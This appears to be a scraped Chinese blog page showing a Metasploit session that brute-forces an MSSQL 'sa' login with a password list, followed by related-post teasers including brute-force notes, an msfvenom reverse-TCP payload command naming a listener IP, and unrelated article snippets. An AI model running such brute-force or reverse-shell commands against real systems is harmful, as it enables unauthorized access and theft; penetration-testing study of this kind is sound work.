show options:

msf auxiliary(scanner/mssql/mssql_login) > show options

Module options (auxiliary/scanner/mssql/mssql_login):

   Name                 Current Setting                           Required  Description

   ----                 ---------------                           --------  -----------

   BLANK_PASSWORDS      false                                     no        Try blank passwords for all users

   BRUTEFORCE_SPEED     5                                         yes       How fast to bruteforce, from 0 to 5

   DB_ALL_CREDS         false                                     no        Try each user/password couple stored in the current database

   DB_ALL_PASS          false                                     no        Add all passwords in the current database to the list

   DB_ALL_USERS         false                                     no        Add all users in the current database to the list

   PASSWORD                                                       no        A specific password to authenticate with

   PASS_FILE            /home/i3ekr/Desktop/dict/pass-top100.txt  no        File containing passwords, one per line

   RHOSTS               10.40.21.28                               yes       The target address range or CIDR identifier

   RPORT                1433                                      yes       The target port (TCP)

   STOP_ON_SUCCESS      false                                     yes       Stop guessing when a credential works for a host

   TDSENCRYPTION        false                                     yes       Use TLS/SSL for TDS data "Force Encryption"

   THREADS              1                                         yes       The number of concurrent threads

   USERNAME             sa                                        no        A specific username to authenticate as

   USERPASS_FILE                                                  no        File containing users and passwords separated by space, one pair per line

   USER_AS_PASS         false                                     no        Try the username as the password for all users

   USER_FILE                                                      no        File containing usernames, one per line

   USE_WINDOWS_AUTHENT  false                                     yes       Use windows authentification (requires DOMAIN option set)

   VERBOSE              true                                      yes       Whether to print output for all attempts

msf auxiliary(scanner/mssql/mssql_login) > run 

[*] 10.40.21.28:1433      - 10.40.21.28:1433 - MSSQL - Starting authentication scanner.

[!] 10.40.21.28:1433      - No active DB -- Credential data will not be saved!

[-] 10.40.21.28:1433      - 10.40.21.28:1433 - LOGIN FAILED: WORKSTATION\sa:123456 (Incorrect: )

[-] 10.40.21.28:1433      - 10.40.21.28:1433 - LOGIN FAILED: WORKSTATION\sa:npdx123! (Incorrect: )

MSF爆破MSSQL的更多相关文章

  1. msf爆破

    SSH服务口令猜解: msf > use auxiliary/scanner/ssh/ssh_loginmsf auxiliary(ssh_login) > show optionsmsf ...

  2. msf学习笔记

    metasploit frame 这是一个渗透测试框架,围绕这个框架,我们就可以完成最终的目标,即渗透测试. 渗透测试者困扰:需要掌握数百个工具,上千条命令参数,很难记住. 新出现的漏洞PoC/EXP ...

  3. kali linux之msf信息收集

    nmap扫描 Auxiliary 扫描模块 目前有557个扫描方式

  4. 第十七章 Metasploit Framework

    渗透测试者的困扰▪ 需要掌握数百个工具软件,上千个命令参数,实在记不住▪ 新出现的漏洞PoC/EXP有不同的运行环境要求,准备工作繁琐▪ 大部分时间都在学习使用不同工具的使用习惯,如果能统一就好了▪ ...

  5. Metasploit基础命令

    msf > show exploits 列Metasploip的所有可用的渗透测试框架.在MSF终端中可以针对渗透测试中发现的安全漏洞来实施相应的渗透攻击. msf > show auxi ...

  6. hashcat 密码破解工具 使用教程

    日期:2019-08-16 15:03:12 更新: 作者:Bay0net 介绍:记录一下 hashcat 的使用命令 0x01.Install Hashcat Wiki - FAQ Github - ...

  7. tomcat漏洞利用总结

    一.后台war包getshell 漏洞利用: tomcat在conf/tomcat-users.xml配置用户权限 <?xml version="1.0" encoding= ...

  8. msf各种弱口令爆破

    Msf: 写的很乱 记录下msf各个爆破弱口令的模块 run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24 使用arp_scanner模块 ...

  9. Msf的一些常用操作

    payload的几个常用生成 生成windows下的反弹木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=60.205.212.140 LPOR ...

随机推荐

  1. 第一次通过CLR Profile解决内存占用过高的问题

    炮哥:"嘿,哥们,忙啥呢,电脑卡成这逼样." 勇哥:"在用CLR Profile工具分析下FlexiPrint的内存占用情况." 炮哥:“哎哟,不错啊,玩高级的 ...

  2. VC学习笔记:对话框

    VC学习笔记:对话框 SkySeraph NOV.11st 2009 HQU Email-zgzhaobo@gmail.com  QQ-452728574 Latest Modified Date:O ...

  3. delphi鼠标状态

    Screen.Cursor := crNo;

  4. BZOJ 1015 星球大战(并查集)

    正着不好搞,考虑倒着搞.倒着搞就是一个并查集. # include <cstdio> # include <cstring> # include <cstdlib> ...

  5. 【bzoj3932】[CQOI2015]任务查询系统 离散化+主席树

    题目描述 最近实验室正在为其管理的超级计算机编制一套任务管理系统,而你被安排完成其中的查询部分.超级计算机中的任务用三元组(Si,Ei,Pi)描述,(Si,Ei,Pi)表示任务从第Si秒开始,在第Ei ...

  6. 《转》HTTP 协议入门

    HTTP 协议是互联网的基础协议,也是网页开发的必备知识,最新版本 HTTP/2 更是让它成为技术热点. 本文介绍 HTTP 协议的历史演变和设计思路. 一.HTTP/0.9 HTTP 是基于 TCP ...

  7. 【刷题】BZOJ 2179 FFT快速傅立叶

    Description 给出两个n位10进制整数x和y,你需要计算x*y. Input 第一行一个正整数n. 第二行描述一个位数为n的正整数x. 第三行描述一个位数为n的正整数y. Output 输出 ...

  8. [BZOJ4036] [HAOI2015]按位或

    传送门:https://lydsy.com/JudgeOnline/problem.php?id=4036 Description 刚开始你有一个数字0,每一秒钟你会随机选择一个[0,2^n-1]的数 ...

  9. KNIGHTS - Knights of the Round Table 圆桌骑士 点双 + 二分图判定

    ---题面--- 题解: 考场上只想到了找点双,,,,然后不知道怎么处理奇环的问题. 我们考虑对图取补集,这样两点之间连边就代表它们可以相邻, 那么一个点合法当且仅当有至少一个大小至少为3的奇环经过了 ...

  10. Android 数据库升级中数据保持和导入已有数据库

    一.数据库升级: 在我们的程序中,或多或少都会涉及到数据库,使用数据库必定会涉及到数据库的升级,数据库升级带来的一些问题,如旧版本数据库的数据记录的保持,对新表的字段的添加等等一系列问题,还记得当我来 ...